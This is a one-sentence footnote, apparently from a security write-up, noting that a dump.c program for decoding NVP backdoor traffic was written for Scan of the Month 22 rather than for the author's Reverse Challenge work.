[2] The dump.c program that allows to decode NVP backdoor traffic was written specifically for the Scan of the Month 22, not during my work on the Reverse Challenge.